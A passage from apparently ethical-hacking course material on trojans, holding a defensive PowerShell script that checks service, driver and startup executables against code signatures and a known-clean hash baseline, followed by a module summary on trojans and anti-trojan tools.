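    foreach ($s in Get-CimInstance Win32_Service)        { [pscustomobject]@{ Source = "service $($s.Name)"; Path = Resolve-ImagePath $s.PathName } }
    foreach ($d in Get-CimInstance Win32_SystemDriver)   { [pscustomobject]@{ Source = "driver $($d.Name)";  Path = Resolve-ImagePath $d.PathName } }
    foreach ($r in Get-CimInstance Win32_StartupCommand) { [pscustomobject]@{ Source = "startup $($r.Name)"; Path = Resolve-ImagePath $r.Command } }
}

function Invoke-TrojanTriage {
    # $BaselinePath (hypothetical) is a CSV with Path,Hash columns taken from a known-clean build
    param([string]$BaselinePath)
    $baseline = @{}
    if ($BaselinePath -and (Test-Path -LiteralPath $BaselinePath)) {
        Import-Csv -LiteralPath $BaselinePath | ForEach-Object { $baseline[$_.Path.ToLower()] = $_.Hash }
    }
    Get-TriageCandidates | Where-Object { $_.Path -and (Test-Path -LiteralPath $_.Path) } |
        Sort-Object Path -Unique | ForEach-Object {
            $sig   = Get-AuthenticodeSignature -FilePath $_.Path
            $hash  = (Get-FileHash -Algorithm SHA256 -LiteralPath $_.Path).Hash
            $known = $baseline[$_.Path.ToLower()]
            # Step 9: unsigned, tampered, or drifted from the baseline gets flagged for review
            [pscustomobject]@{
                Source = $_.Source; Path = $_.Path; Signature = $sig.Status
                Publisher  = $sig.SignerCertificate.Subject
                Suspicious = ($sig.Status -ne 'Valid') -or ($known -and $known -ne $hash)
            }
        }
}

Invoke-TrojanTriage -BaselinePath '.\baseline.csv' | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Processes whose image path cannot be read (System, protected processes) drop out of the listing, so reconcile the port column against TCPView or CurrPorts output before treating a listener as accounted for.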
Module Summary

Trojans are malicious pieces of code that carry cracker software to a target system.
They are used primarily to gain and retain access on the target system.
They often reside deep in the system and make registry changes that allow them to meet their purpose as a remote administration tool.
Popular Trojans include MoSucker, RemoteByMail, Illusion Bot, and Zeus.
Awareness and preventive measures are the best defences against Trojans.
Anti-Trojan tools such as TrojanHunter and Emsisoft Anti-Malware can be used to detect and eliminate Trojans.